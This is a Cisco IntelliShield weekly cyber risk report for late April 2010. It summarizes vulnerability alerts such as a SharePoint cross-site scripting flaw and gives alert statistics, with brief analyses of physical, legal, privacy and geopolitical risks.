Vulnerability

Vulnerability and threat activity was decreased this period from previous periods. Similarly, the vulnerability and threat levels for April 2010 was decreased from the previous 2010 monthly periods. Following the elevated month of March, largely due to the increased activity around the CanSecWest hacking contest, the decrease may allow vulnerability and patch management teams to catch up with updates across their environments.

The period was highlighted by a Microsoft Sharepoint server cross-site scripting vulnerability that can allow an unauthenticated, remote attacker to obtain sensitive information, user authentication cookies, and take actions with the privileges of the compromised user accounts. Proof-of-concept exploit code has been publicly reported, and Microsoft has confirmed the vulnerability and released a security advisory; however, updates correcting the vulnerability are not available. This vulnerability is being widely discussed, and although there have not been reported attacks, the focused interest indicates working exploits will likely be developed and deployed. The vulnerability was reported in IntelliShield alert 20415.

The Open Web Application Security Project (OWASP) has released an updated Top 10 Web Application Security Risk for 2010. The updated list contains two changes: the return of the previously removed Security Configuration risk and the addition of the Unvalidated Redirects and Forwards risk.

IntelliShield published 75 events last week: 34 new events and 41 updated events. Of the 75 events, 55 were Vulnerability Alerts, two were Security Activity Bulletins, 17 were Threat Outbreak Alerts, and one was a Cyber Risk Report. The alert publication totals are as follows

Weekly Alert Totals

Day

Date

New

Updated

Total

Friday

04/30/2010

1

16

17

Thursday

04/29/2010

9

2

11

Wednesday

04/28/2010

8

8

16

Tuesday

04/27/2010

8

10

18

Monday

04/26/2010

8

5

13

Weekly Total

—

34

41

75

2010 Monthly Alert Totals

Month

New

Updated

Monthly Total

January

158

259

417

February

177

253

430

March

194

324

518

April

208

167

375

Annual Total

737

1003

1740

Significant Alerts for April 26–May 2, 2010

Microsoft SharePoint Server 2007 versions SP2 and prior contain a cross-site scripting vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary HTML or script code in a user's browser. Proof-of-concept code that exploits this vulnerability is publicly available. Microsoft has confirmed this vulnerability, but software updates are not available.

Previous Alerts That Still Represent Significant Risk

A McAfee DAT file that was distributed to VirusScan applications has caused errors on certain Microsoft Windows XP-based systems. As a result of installing the 5958 DAT file and rebooting, systems may be rendered unusable. McAfee has released a knowledgebase article with various workarounds.

Oracle Java contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands on the system with the privileges of the user. Systems with Oracle Java JRE and JDK 6 Update 10 and later contain the affected ActiveX control and are vulnerable. Updates are available.

Multiple TLS implementations contain a vulnerability when renegotiating a Transport Layer Security (TLS) session that could allow an unauthenticated, remote attacker to conduct a man-in-the-middle attack. Proof-of-concept code that exploits this vulnerability is publicly available. Mozilla and Oracle, in addition to other vendors, have released updates for this vulnerability.

Microsoft has re-released a security advisory and updated software to address the Microsoft Internet Explorer invalid pointer reference access arbitrary code execution vulnerability. Functional exploit code is being used in ongoing exploits, and Microsoft has released a security bulletin and updated software.

Microsoft has released a security advisory with information about affected products to address the Microsoft Internet Explorer unsafe help file handling arbitrary code execution vulnerability. Proof-of-concept code that demonstrates code execution is available.

Physical

New York City Subway Master Key Gets Into Wrong Hands

Master keys to New York City subway entrances inadvertently found their way into the hands of those who should have not had access, including those who are criminally inclined. The keys, which allow emergency officials (such as police, emergency medical services, and city transit) to enter special gates during times of crisis, are apparently being sold to willing buyers on the black market. While honest riders are rejecting the advances of those illegally selling these keys, the expected increase in New York City transit fares could sway those who normally would not take to such dishonest acts. Read More

IntelliShield Analysis: In the computer networking world, the concept of a physical master key could be equated to that of an administrator password for a device or application. Issues resulting from the use of default, lost or stolen administrator passwords have, for years, driven many companies to look for additional levels of security when protecting their networks, end hosts and proprietary data. These additional levels of protection include such technologies and policies as 2-factor authentication consisting of something you know (PIN) and something you have (key card), one time passwords (OTPs), the use of complex and frequently changed passwords, biometrics, separation of privileges and role-based access controls. While the implementation of some of these concepts may not be applicable in this scenario, or in many cases would increase the complexity and cost of protection for the New York City subway system, the net result would be a more difficult barrier of entry to those that should not be riding the subway for free, while giving those legitimately riding the subway a greater sense of safety.

Legal

The United States Federal Trade Commission (FTC), expected to release a set of best practices to address business concerns about online privacy by September 2010, met with aides to U.S. Senators and staff from Facebook, the social networking website, to discuss online privacy concerns. Lawmakers have requested that the FTC issue guidelines that will help ensure that users' personal information is protected by social media companies. Officials from Facebook announced at a subsequent news conference that they would support FTC guidelines that companies could align with voluntarily. Read MoreAdditional Information

IntelliShield Analysis: Regardless of pending FTC guidelines, concern over the safeguarding of users' privacy continues to grow. Social networking sites such as Facebook that force users to opt out of frequent innovations for sharing personal data, particularly with third-party advertisers, are attracting more attention from lawmakers for a number of reasons, one being that third-party advertisers are allowed to store user information indefinitely. As the tension between what users share voluntarily and what is shared involuntarily and harvested for profit increases, users are advised to keep an eye on the security settings of their accounts and to stay abreast of policy changes to the social websites they frequent.

Trust

There was no significant activity in this category during the time period.

Identity

There was no significant activity in this category during the time period.

Human

French Researchers Expose BitTorrent Privacy Threats

In a series of papers published over the last few months, researchers from the French National Institute for Research in Computer Science and Control (INRIA) have exposed various aspects that threaten the privacy of BitTorrent users. Among their findings, the INRIA researchers described how a single computer on the Internet could log and track the download and upload history of most BitTorrent users, over a long period of time (103 days in their study). They also showed that even 70% of the BitTorrent users who utilized the Tor anonymizing proxy network were able to be identified, and how that identification could lead to further de-anonymizing their other traffic over the Tor network. Read More

IntelliShield Analysis: While BitTorrent has shown to be a very efficient method to distribute large media files quickly, it has taken quite a bit of criticism from content authors whose material can be easily shared illegally. This research goes beyond the controversy, however, to show that even if BitTorrent is used only to distribute content legally, it presents a privacy risk to users. These privacy concerns have been shown in traditional torrent tracker networks, as well as trackerless Distributed Hash Table (DHT) networks that aim to be more privacy-oriented. Users and organizations that rely on BitTorrent or underlying concepts like DHT for peer-to-peer communication and file transfer should review the researchers' findings and assess any risks that may arise from them.

Geopolitical

Greek Debt Crisis Threatens to Spread

Eurozone finance ministers, along with European Central Bank and International Monetary Fund officials, agreed over the weekend on the basics of a bailout plan for debt-ridden Greece. The agreement includes tough austerity measures, including a three-year freeze on public sector wages, tax hikes, and a raising of the retirement age. It was hoped that the measures pitched to skeptical Eurozone taxpayers as protective of the Euro rather than as a Greek bailout would be enough to allay investor concerns over the risk of the debt contagion spreading. Besides being slow to take shape, the plan has many critics, who argue that without a basic restructuring of sovereign debt, Greece cannot hope to avoid default down the road. Asian countries argued that the measures were too lenient, compared with the austerity measures shouldered by countries like Thailand during the Asian financial crisis. At the same time, a downgrading of Spain and Portugal's sovereign debt last week seemed to confirm some fears that slow-moving financial authorities had already failed to contain the crisis. Read MoreAdditional Information

IntelliShield Analysis: Given the relatively small size of the Greek economy, Athens debt crisis on its own may have been manageable. What has elevated it to a global concern is the widening of the problem to larger European economies such as Spain and Portugal, whose debts may be difficult for weakened Eurozone banks to absorb. Slow progress toward a bailout package is also of concern, as it casts doubt on the ability of EU countries to set aside individual national concerns in pursuit of regional solutions. Information security professionals can expect continued disruptions across Europe in coming weeks as Berlin seeks Bundestag approval for the financial package, $11 billion dollars in Greek debt comes due in mid-May, and planned general strikes take place. More broadly, factors that affect the debt crisis like the chaos that followed Iceland's volcanic eruption and the closing of European airspace recently are other examples of the region's struggle to establish effective mechanisms for solving such problems. Over time, these problems increasingly will include crucial information technology issues, such as copyright enforcement, cross-border data privacy, anti-counterfeiting, and cyber security.

This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information on the document or materials linked from the document is at your own risk. Cisco reserves the right to change or update this document at any time.